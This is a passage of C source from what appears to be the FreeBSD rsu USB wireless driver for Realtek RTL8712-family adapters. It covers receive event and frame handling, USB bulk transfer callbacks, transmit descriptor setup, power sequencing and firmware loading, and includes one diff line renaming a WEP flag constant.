BSS event len=%d res=%d\n", len, res); if (res <= 0) { RSU_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); RSU_LOCK(sc); return; } DPRINTF("associated with %s associd=%d\n", ether_sprintf(rsp->bss.macaddr), le32toh(rsp->associd)); ni->ni_associd = le32toh(rsp->associd) | 0xc000; RSU_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_RUN, IEEE80211_FC0_SUBTYPE_ASSOC_RESP); RSU_LOCK(sc); } static void rsu_rx_event(struct rsu_softc *sc, uint8_t code, uint8_t *buf, int len) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTFN(4, "Rx event code=%d len=%d\n", code, len); switch (code) { case R92S_EVT_SURVEY: if (vap->iv_state == IEEE80211_S_SCAN) rsu_event_survey(sc, buf, len); break; case R92S_EVT_SURVEY_DONE: DPRINTF("site survey pass %d done, found %d BSS\n", sc->scan_pass, le32toh(*(uint32_t *)buf)); if (vap->iv_state != IEEE80211_S_SCAN) break; /* Ignore if not scanning. */ if (sc->scan_pass == 0 && vap->iv_des_nssid != 0) { /* Schedule a directed scan for hidden APs. 
*/ sc->scan_pass = 1; RSU_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); RSU_LOCK(sc); break; } sc->scan_pass = 0; break; case R92S_EVT_JOIN_BSS: if (vap->iv_state == IEEE80211_S_AUTH) rsu_event_join_bss(sc, buf, len); break; case R92S_EVT_DEL_STA: DPRINTF("disassociated from %s\n", ether_sprintf(buf)); if (vap->iv_state == IEEE80211_S_RUN && IEEE80211_ADDR_EQ(vap->iv_bss->ni_bssid, buf)) { RSU_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); RSU_LOCK(sc); } break; case R92S_EVT_WPS_PBC: DPRINTF("WPS PBC pushed.\n"); break; case R92S_EVT_FWDBG: if (ifp->if_flags & IFF_DEBUG) { buf[60] = '\0'; printf("FWDBG: %s\n", (char *)buf); } break; } } static void rsu_rx_multi_event(struct rsu_softc *sc, uint8_t *buf, int len) { struct r92s_fw_cmd_hdr *cmd; int cmdsz; DPRINTFN(6, "Rx events len=%d\n", len); /* Skip Rx status. */ buf += sizeof(struct r92s_rx_stat); len -= sizeof(struct r92s_rx_stat); /* Process all events. */ for (;;) { /* Check that command header fits. */ if (__predict_false(len < sizeof(*cmd))) break; cmd = (struct r92s_fw_cmd_hdr *)buf; /* Check that command payload fits. */ cmdsz = le16toh(cmd->len); if (__predict_false(len < sizeof(*cmd) + cmdsz)) break; /* Process firmware event. */ rsu_rx_event(sc, cmd->code, (uint8_t *)&cmd[1], cmdsz); if (!(cmd->seq & R92S_FW_CMD_MORE)) break; buf += sizeof(*cmd) + cmdsz; len -= sizeof(*cmd) + cmdsz; } } static int8_t rsu_get_rssi(struct rsu_softc *sc, int rate, void *physt) { static const int8_t cckoff[] = { 14, -2, -20, -40 }; struct r92s_rx_phystat *phy; struct r92s_rx_cck *cck; uint8_t rpt; int8_t rssi; if (rate <= 3) { cck = (struct r92s_rx_cck *)physt; rpt = (cck->agc_rpt >> 6) & 0x3; rssi = cck->agc_rpt & 0x3e; rssi = cckoff[rpt] - rssi; } else { /* OFDM/HT. */ phy = (struct r92s_rx_phystat *)physt; rssi = ((le32toh(phy->phydw1) >> 1) & 0x7f) - 106; } return (rssi); } static struct mbuf * rsu_rx_frame(struct rsu_softc *sc, uint8_t *buf, int pktlen, int *rssi) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct r92s_rx_stat *stat; uint32_t rxdw0, rxdw3; struct mbuf *m; uint8_t rate; int infosz; stat = (struct r92s_rx_stat *)buf; rxdw0 = le32toh(stat->rxdw0); rxdw3 = le32toh(stat->rxdw3); if (__predict_false(rxdw0 & R92S_RXDW0_CRCERR)) { ifp->if_ierrors++; return NULL; } if (__predict_false(pktlen < sizeof(*wh) || pktlen > MCLBYTES)) { ifp->if_ierrors++; return NULL; } rate = MS(rxdw3, R92S_RXDW3_RATE); infosz = MS(rxdw0, R92S_RXDW0_INFOSZ) * 8; /* Get RSSI from PHY status descriptor if present. */ if (infosz != 0) *rssi = rsu_get_rssi(sc, rate, &stat[1]); else *rssi = 0; DPRINTFN(5, "Rx frame len=%d rate=%d infosz=%d rssi=%d\n", pktlen, rate, infosz, *rssi); MGETHDR(m, M_DONTWAIT, MT_DATA); if (__predict_false(m == NULL)) { ifp->if_ierrors++; return NULL; } if (pktlen > MHLEN) { MCLGET(m, M_DONTWAIT); if (__predict_false(!(m->m_flags & M_EXT))) { ifp->if_ierrors++; m_freem(m); return NULL; } } /* Finalize mbuf. */ m->m_pkthdr.rcvif = ifp; /* Hardware does Rx TCP checksum offload. */ if (rxdw3 & R92S_RXDW3_TCPCHKVALID) { if (__predict_true(rxdw3 & R92S_RXDW3_TCPCHKRPT)) m->m_pkthdr.csum_flags |= CSUM_DATA_VALID; } wh = (struct ieee80211_frame *)((uint8_t *)&stat[1] + infosz); memcpy(mtod(m, uint8_t *), wh, pktlen); m->m_pkthdr.len = m->m_len = pktlen; if (ieee80211_radiotap_active(ic)) { struct rsu_rx_radiotap_header *tap = &sc->sc_rxtap; /* Map HW rate index to 802.11 rate. */ tap->wr_flags = 2; if (!(rxdw3 & R92S_RXDW3_HTC)) { switch (rate) { /* CCK. 
*/ case 0: tap->wr_rate = 2; break; case 1: tap->wr_rate = 4; break; case 2: tap->wr_rate = 11; break; case 3: tap->wr_rate = 22; break; /* OFDM. */ case 4: tap->wr_rate = 12; break; case 5: tap->wr_rate = 18; break; case 6: tap->wr_rate = 24; break; case 7: tap->wr_rate = 36; break; case 8: tap->wr_rate = 48; break; case 9: tap->wr_rate = 72; break; case 10: tap->wr_rate = 96; break; case 11: tap->wr_rate = 108; break; } } else if (rate >= 12) { /* MCS0~15. */ /* Bit 7 set means HT MCS instead of rate. */ tap->wr_rate = 0x80 | (rate - 12); } tap->wr_dbm_antsignal = *rssi; tap->wr_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wr_chan_flags = htole16(ic->ic_curchan->ic_flags); } return (m); } static struct mbuf * rsu_rx_multi_frame(struct rsu_softc *sc, uint8_t *buf, int len, int *rssi) { struct r92s_rx_stat *stat; uint32_t rxdw0; int totlen, pktlen, infosz, npkts; struct mbuf *m, *m0 = NULL, *prevm = NULL; /* Get the number of encapsulated frames. */ stat = (struct r92s_rx_stat *)buf; npkts = MS(le32toh(stat->rxdw2), R92S_RXDW2_PKTCNT); DPRINTFN(6, "Rx %d frames in one chunk\n", npkts); /* Process all of them. */ while (npkts-- > 0) { if (__predict_false(len < sizeof(*stat))) break; stat = (struct r92s_rx_stat *)buf; rxdw0 = le32toh(stat->rxdw0); pktlen = MS(rxdw0, R92S_RXDW0_PKTLEN); if (__predict_false(pktlen == 0)) break; infosz = MS(rxdw0, R92S_RXDW0_INFOSZ) * 8; /* Make sure everything fits in xfer. */ totlen = sizeof(*stat) + infosz + pktlen; if (__predict_false(totlen > len)) break; /* Process 802.11 frame. */ m = rsu_rx_frame(sc, buf, pktlen, rssi); if (m0 == NULL) m0 = m; if (prevm == NULL) prevm = m; else { prevm->m_next = m; prevm = m; } /* Next chunk is 128-byte aligned. */ totlen = (totlen + 127) & ~127; buf += totlen; len -= totlen; } return (m0); } static struct mbuf * rsu_rxeof(struct usb_xfer *xfer, struct rsu_data *data, int *rssi) { struct rsu_softc *sc = data->sc; struct r92s_rx_stat *stat; int len; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); if (__predict_false(len < sizeof(*stat))) { DPRINTF("xfer too short %d\n", len); sc->sc_ifp->if_ierrors++; return (NULL); } /* Determine if it is a firmware C2H event or an 802.11 frame. */ stat = (struct r92s_rx_stat *)data->buf; if ((le32toh(stat->rxdw1) & 0x1ff) == 0x1ff) { rsu_rx_multi_event(sc, data->buf, len); /* No packets to process. */ return (NULL); } else return (rsu_rx_multi_frame(sc, data->buf, len, rssi)); } static void rsu_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct rsu_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL, *next; struct rsu_data *data; int rssi = 1; RSU_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto tr_setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); m = rsu_rxeof(xfer, data, &rssi); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) { KASSERT(m == NULL, ("mbuf isn't NULL")); return; } STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. 
*/ RSU_UNLOCK(sc); while (m != NULL) { next = m->m_next; m->m_next = NULL; wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void)ieee80211_input(ni, m, rssi, 0); ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi, 0); m = next; } RSU_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. */ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto tr_setup; } break; } } static void rsu_txeof(struct usb_xfer *xfer, struct rsu_data *data) { struct rsu_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; RSU_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB) { /* XXX status? */ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { ieee80211_free_node(data->ni); data->ni = NULL; } sc->sc_tx_timer = 0; ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void rsu_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct rsu_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct rsu_data *data; RSU_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto tr_setup; DPRINTF("transfer done %p\n", data); STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); rsu_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF("empty pending queue sc %p\n", sc); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); DPRINTF("submitting transfer %p\n", data); usbd_transfer_submit(xfer); rsu_start_locked(ifp); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto tr_setup; if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static int rsu_tx_start(struct rsu_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, struct rsu_data *data) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_frame *wh; struct ieee80211_key *k = NULL; struct r92s_tx_desc *txd; struct usb_xfer *xfer; uint8_t type, tid = 0; int hasqos, xferlen; struct usb_xfer *rsu_pipes[4] = { sc->sc_xfer[RSU_BULK_TX_BE], sc->sc_xfer[RSU_BULK_TX_BK], sc->sc_xfer[RSU_BULK_TX_VI], sc->sc_xfer[RSU_BULK_TX_VO] }; RSU_ASSERT_LOCKED(sc); wh = mtod(m0, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { device_printf(sc->sc_dev, "ieee80211_crypto_encap returns NULL.\n"); /* XXX we don't expect the fragmented frames */ m_freem(m0); return (ENOBUFS); } wh = mtod(m0, struct ieee80211_frame *); } switch (type) { case IEEE80211_FC0_TYPE_CTL: case IEEE80211_FC0_TYPE_MGT: xfer = sc->sc_xfer[RSU_BULK_TX_VO]; break; default: 
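		/*
		 * Data frames: select the bulk-out pipe from the WME access
		 * category (BE/BK/VI/VO) recorded in the mbuf.
		 */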
KASSERT(M_WME_GETAC(m0) < 4, ("unsupported WME pipe %d", M_WME_GETAC(m0))); xfer = rsu_pipes[M_WME_GETAC(m0)]; break; } hasqos = 0; /* Fill Tx descriptor. */ txd = (struct r92s_tx_desc *)data->buf; memset(txd, 0, sizeof(*txd)); txd->txdw0 |= htole32( SM(R92S_TXDW0_PKTLEN, m0->m_pkthdr.len) | SM(R92S_TXDW0_OFFSET, sizeof(*txd)) | R92S_TXDW0_OWN | R92S_TXDW0_FSG | R92S_TXDW0_LSG); txd->txdw1 |= htole32( SM(R92S_TXDW1_MACID, R92S_MACID_BSS) | SM(R92S_TXDW1_QSEL, R92S_TXDW1_QSEL_BE)); if (!hasqos) txd->txdw1 |= htole32(R92S_TXDW1_NONQOS); #ifdef notyet if (k != NULL) { switch (k->wk_cipher->ic_cipher) { case IEEE80211_CIPHER_WEP: cipher = R92S_TXDW1_CIPHER_WEP; break; case IEEE80211_CIPHER_TKIP: cipher = R92S_TXDW1_CIPHER_TKIP; break; case IEEE80211_CIPHER_AES_CCM: cipher = R92S_TXDW1_CIPHER_AES; break; default: cipher = R92S_TXDW1_CIPHER_NONE; } txd->txdw1 |= htole32( SM(R92S_TXDW1_CIPHER, cipher) | SM(R92S_TXDW1_KEYIDX, k->k_id)); } #endif txd->txdw2 |= htole32(R92S_TXDW2_BK); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) txd->txdw2 |= htole32(R92S_TXDW2_BMCAST); /* * Firmware will use and increment the sequence number for the * specified TID. */ txd->txdw3 |= htole32(SM(R92S_TXDW3_SEQ, tid)); if (ieee80211_radiotap_active_vap(vap)) { struct rsu_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wt_chan_flags = htole16(ic->ic_curchan->ic_flags); ieee80211_radiotap_tx(vap, m0); } xferlen = sizeof(*txd) + m0->m_pkthdr.len; m_copydata(m0, 0, m0->m_pkthdr.len, (caddr_t)&txd[1]); data->buflen = xferlen; data->ni = ni; data->m = m0; STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); usbd_transfer_start(xfer); return (0); } static void rsu_start(struct ifnet *ifp) { struct rsu_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; RSU_LOCK(sc); rsu_start_locked(ifp); RSU_UNLOCK(sc); } static void rsu_start_locked(struct ifnet *ifp) { struct rsu_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; struct rsu_data *bf; RSU_ASSERT_LOCKED(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; bf = rsu_getbuf(sc); if (bf == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; if (rsu_tx_start(sc, ni, m, bf) != 0) { ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); ieee80211_free_node(ni); break; } sc->sc_tx_timer = 5; callout_reset(&sc->sc_watchdog_ch, hz, rsu_watchdog, sc); } } static void rsu_watchdog(void *arg) { struct rsu_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { device_printf(sc->sc_dev, "device timeout\n"); /* rsu_init(ifp); XXX needs a process context! 
*/ ifp->if_oerrors++; return; } callout_reset(&sc->sc_watchdog_ch, hz, rsu_watchdog, sc); } } static int rsu_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { rsu_init(ifp->if_softc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rsu_stop(ifp, 1); } if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } /* * Power on sequence for A-cut adapters. */ static void rsu_power_on_acut(struct rsu_softc *sc) { uint32_t reg; rsu_write_1(sc, R92S_SPS0_CTRL + 1, 0x53); rsu_write_1(sc, R92S_SPS0_CTRL + 0, 0x57); /* Enable AFE macro block's bandgap and Mbias. */ rsu_write_1(sc, R92S_AFE_MISC, rsu_read_1(sc, R92S_AFE_MISC) | R92S_AFE_MISC_BGEN | R92S_AFE_MISC_MBEN); /* Enable LDOA15 block. */ rsu_write_1(sc, R92S_LDOA15_CTRL, rsu_read_1(sc, R92S_LDOA15_CTRL) | R92S_LDA15_EN); rsu_write_1(sc, R92S_SPS1_CTRL, rsu_read_1(sc, R92S_SPS1_CTRL) | R92S_SPS1_LDEN); usb_pause_mtx(&sc->sc_mtx, 2 * hz); /* Enable switch regulator block. */ rsu_write_1(sc, R92S_SPS1_CTRL, rsu_read_1(sc, R92S_SPS1_CTRL) | R92S_SPS1_SWEN); rsu_write_4(sc, R92S_SPS1_CTRL, 0x00a7b267); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, rsu_read_1(sc, R92S_SYS_ISO_CTRL + 1) | 0x08); rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x20); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, rsu_read_1(sc, R92S_SYS_ISO_CTRL + 1) & ~0x90); /* Enable AFE clock. */ rsu_write_1(sc, R92S_AFE_XTAL_CTRL + 1, rsu_read_1(sc, R92S_AFE_XTAL_CTRL + 1) & ~0x04); /* Enable AFE PLL macro block. */ rsu_write_1(sc, R92S_AFE_PLL_CTRL, rsu_read_1(sc, R92S_AFE_PLL_CTRL) | 0x11); /* Attach AFE PLL to MACTOP/BB. */ rsu_write_1(sc, R92S_SYS_ISO_CTRL, rsu_read_1(sc, R92S_SYS_ISO_CTRL) & ~0x11); /* Switch to 40MHz clock instead of 80MHz. */ rsu_write_2(sc, R92S_SYS_CLKR, rsu_read_2(sc, R92S_SYS_CLKR) & ~R92S_SYS_CLKSEL); /* Enable MAC clock. */ rsu_write_2(sc, R92S_SYS_CLKR, rsu_read_2(sc, R92S_SYS_CLKR) | R92S_MAC_CLK_EN | R92S_SYS_CLK_EN); rsu_write_1(sc, R92S_PMC_FSM, 0x02); /* Enable digital core and IOREG R/W. */ rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x08); rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x80); /* Switch the control path to firmware. */ reg = rsu_read_2(sc, R92S_SYS_CLKR); reg = (reg & ~R92S_SWHW_SEL) | R92S_FWHW_SEL; rsu_write_2(sc, R92S_SYS_CLKR, reg); rsu_write_2(sc, R92S_CR, 0x37fc); /* Fix USB RX FIFO issue. */ rsu_write_1(sc, 0xfe5c, rsu_read_1(sc, 0xfe5c) | 0x80); rsu_write_1(sc, 0x00ab, rsu_read_1(sc, 0x00ab) | 0xc0); rsu_write_1(sc, R92S_SYS_CLKR, rsu_read_1(sc, R92S_SYS_CLKR) & ~R92S_SYS_CPU_CLKSEL); } /* * Power on sequence for B-cut and C-cut adapters. */ static void rsu_power_on_bcut(struct rsu_softc *sc) { uint32_t reg; int ntries; /* Prevent eFuse leakage. */ rsu_write_1(sc, 0x37, 0xb0); usb_pause_mtx(&sc->sc_mtx, 10); rsu_write_1(sc, 0x37, 0x30); /* Switch the control path to hardware. 
*/ reg = rsu_read_2(sc, R92S_SYS_CLKR); if (reg & R92S_FWHW_SEL) { rsu_write_2(sc, R92S_SYS_CLKR, reg & ~(R92S_SWHW_SEL | R92S_FWHW_SEL)); } rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) & ~0x8c); DELAY(1000); rsu_write_1(sc, R92S_SPS0_CTRL + 1, 0x53); rsu_write_1(sc, R92S_SPS0_CTRL + 0, 0x57); reg = rsu_read_1(sc, R92S_AFE_MISC); rsu_write_1(sc, R92S_AFE_MISC, reg | R92S_AFE_MISC_BGEN); rsu_write_1(sc, R92S_AFE_MISC, reg | R92S_AFE_MISC_BGEN | R92S_AFE_MISC_MBEN | R92S_AFE_MISC_I32_EN); /* Enable PLL. */ rsu_write_1(sc, R92S_LDOA15_CTRL, rsu_read_1(sc, R92S_LDOA15_CTRL) | R92S_LDA15_EN); rsu_write_1(sc, R92S_LDOV12D_CTRL, rsu_read_1(sc, R92S_LDOV12D_CTRL) | R92S_LDV12_EN); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, rsu_read_1(sc, R92S_SYS_ISO_CTRL + 1) | 0x08); rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x20); /* Support 64KB IMEM. */ rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, rsu_read_1(sc, R92S_SYS_ISO_CTRL + 1) & ~0x97); /* Enable AFE clock. */ rsu_write_1(sc, R92S_AFE_XTAL_CTRL + 1, rsu_read_1(sc, R92S_AFE_XTAL_CTRL + 1) & ~0x04); /* Enable AFE PLL macro block. */ reg = rsu_read_1(sc, R92S_AFE_PLL_CTRL); rsu_write_1(sc, R92S_AFE_PLL_CTRL, reg | 0x11); DELAY(500); rsu_write_1(sc, R92S_AFE_PLL_CTRL, reg | 0x51); DELAY(500); rsu_write_1(sc, R92S_AFE_PLL_CTRL, reg | 0x11); DELAY(500); /* Attach AFE PLL to MACTOP/BB. */ rsu_write_1(sc, R92S_SYS_ISO_CTRL, rsu_read_1(sc, R92S_SYS_ISO_CTRL) & ~0x11); /* Switch to 40MHz clock. */ rsu_write_1(sc, R92S_SYS_CLKR, 0x00); /* Disable CPU clock and 80MHz SSC. */ rsu_write_1(sc, R92S_SYS_CLKR, rsu_read_1(sc, R92S_SYS_CLKR) | 0xa0); /* Enable MAC clock. */ rsu_write_2(sc, R92S_SYS_CLKR, rsu_read_2(sc, R92S_SYS_CLKR) | R92S_MAC_CLK_EN | R92S_SYS_CLK_EN); rsu_write_1(sc, R92S_PMC_FSM, 0x02); /* Enable digital core and IOREG R/W. */ rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x08); rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x80); /* Switch the control path to firmware. */ reg = rsu_read_2(sc, R92S_SYS_CLKR); reg = (reg & ~R92S_SWHW_SEL) | R92S_FWHW_SEL; rsu_write_2(sc, R92S_SYS_CLKR, reg); rsu_write_2(sc, R92S_CR, 0x37fc); /* Fix USB RX FIFO issue. */ rsu_write_1(sc, 0xfe5c, rsu_read_1(sc, 0xfe5c) | 0x80); rsu_write_1(sc, R92S_SYS_CLKR, rsu_read_1(sc, R92S_SYS_CLKR) & ~R92S_SYS_CPU_CLKSEL); rsu_write_1(sc, 0xfe1c, 0x80); /* Make sure TxDMA is ready to download firmware. */ for (ntries = 0; ntries < 20; ntries++) { reg = rsu_read_1(sc, R92S_TCR); if ((reg & (R92S_TCR_IMEM_CHK_RPT | R92S_TCR_EMEM_CHK_RPT)) == (R92S_TCR_IMEM_CHK_RPT | R92S_TCR_EMEM_CHK_RPT)) break; DELAY(5); } if (ntries == 20) { DPRINTF("TxDMA is not ready\n"); /* Reset TxDMA. */ reg = rsu_read_1(sc, R92S_CR); rsu_write_1(sc, R92S_CR, reg & ~R92S_CR_TXDMA_EN); DELAY(2); rsu_write_1(sc, R92S_CR, reg | R92S_CR_TXDMA_EN); } } static void rsu_power_off(struct rsu_softc *sc) { /* Turn RF off. */ rsu_write_1(sc, R92S_RF_CTRL, 0x00); usb_pause_mtx(&sc->sc_mtx, 5); /* Turn MAC off. */ /* Switch control path. */ rsu_write_1(sc, R92S_SYS_CLKR + 1, 0x38); /* Reset MACTOP. */ rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, 0x70); rsu_write_1(sc, R92S_PMC_FSM, 0x06); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 0, 0xf9); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, 0xe8); /* Disable AFE PLL. */ rsu_write_1(sc, R92S_AFE_PLL_CTRL, 0x00); /* Disable A15V. */ rsu_write_1(sc, R92S_LDOA15_CTRL, 0x54); /* Disable eFuse 1.2V. 
*/ rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, 0x50); rsu_write_1(sc, R92S_LDOV12D_CTRL, 0x24); /* Enable AFE macro block's bandgap and Mbias. */ rsu_write_1(sc, R92S_AFE_MISC, 0x30); /* Disable 1.6V LDO. */ rsu_write_1(sc, R92S_SPS0_CTRL + 0, 0x56); rsu_write_1(sc, R92S_SPS0_CTRL + 1, 0x43); } static int rsu_fw_loadsection(struct rsu_softc *sc, const uint8_t *buf, int len) { struct rsu_data *data; struct r92s_tx_desc *txd; int mlen; while (len > 0) { data = rsu_getbuf(sc); if (data == NULL) return (ENOMEM); txd = (struct r92s_tx_desc *)data->buf; memset(txd, 0, sizeof(*txd)); if (len <= RSU_TXBUFSZ - sizeof(*txd)) { /* Last chunk. */ txd->txdw0 |= htole32(R92S_TXDW0_LINIP); mlen = len; } else mlen = RSU_TXBUFSZ - sizeof(*txd); txd->txdw0 |= htole32(SM(R92S_TXDW0_PKTLEN, mlen)); memcpy(&txd[1], buf, mlen); data->buflen = sizeof(*txd) + mlen; DPRINTF("starting transfer %p\n", data); STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); buf += mlen; len -= mlen; } usbd_transfer_start(sc->sc_xfer[RSU_BULK_TX_VO]); return (0); } static int rsu_load_firmware(struct rsu_softc *sc) { const struct r92s_fw_hdr *hdr; struct r92s_fw_priv *dmem; const uint8_t *imem, *emem; int imemsz, ememsz; const struct firmware *fw; size_t size; uint32_t reg; int ntries, error; RSU_UNLOCK(sc); /* Read firmware image from the filesystem. */ if ((fw = firmware_get("rsu-rtl8712fw")) == NULL) { device_printf(sc->sc_dev, "%s: failed load firmware of file rsu-rtl8712fw\n", __func__); RSU_LOCK(sc); return (ENXIO); } RSU_LOCK(sc); size = fw->datasize; if (size < sizeof(*hdr)) { device_printf(sc->sc_dev, "firmware too short\n"); error = EINVAL; goto fail; } hdr = (const struct r92s_fw_hdr *)fw->data; if (hdr->signature != htole16(0x8712) && hdr->signature != htole16(0x8192)) { device_printf(sc->sc_dev, "invalid firmware signature 0x%x\n", le16toh(hdr->signature)); error = EINVAL; goto fail; } DPRINTF("FW V%d %02x-%02x %02x:%02x\n", le16toh(hdr->version), hdr->month, hdr->day, hdr->hour, hdr->minute); /* Make sure that driver and firmware are in sync. */ if (hdr->privsz != htole32(sizeof(*dmem))) { device_printf(sc->sc_dev, "unsupported firmware image\n"); error = EINVAL; goto fail; } /* Get FW sections sizes. */ imemsz = le32toh(hdr->imemsz); ememsz = le32toh(hdr->sramsz); /* Check that all FW sections fit in image. */ if (size < sizeof(*hdr) + imemsz + ememsz) { device_printf(sc->sc_dev, "firmware too short\n"); error = EINVAL; goto fail; } imem = (const uint8_t *)&hdr[1]; emem = imem + imemsz; /* Load IMEM section. */ error = rsu_fw_loadsection(sc, imem, imemsz); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware section %s\n", "IMEM"); goto fail; } /* Wait for load to complete. */ for (ntries = 0; ntries < 10; ntries++) { usb_pause_mtx(&sc->sc_mtx, 10); reg = rsu_read_2(sc, R92S_TCR); if (reg & R92S_TCR_IMEM_CODE_DONE) break; } if (ntries == 10 || !(reg & R92S_TCR_IMEM_CHK_RPT)) { device_printf(sc->sc_dev, "timeout waiting for %s transfer\n", "IMEM"); error = ETIMEDOUT; goto fail; } /* Load EMEM section. */ error = rsu_fw_loadsection(sc, emem, ememsz); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware section %s\n", "EMEM"); goto 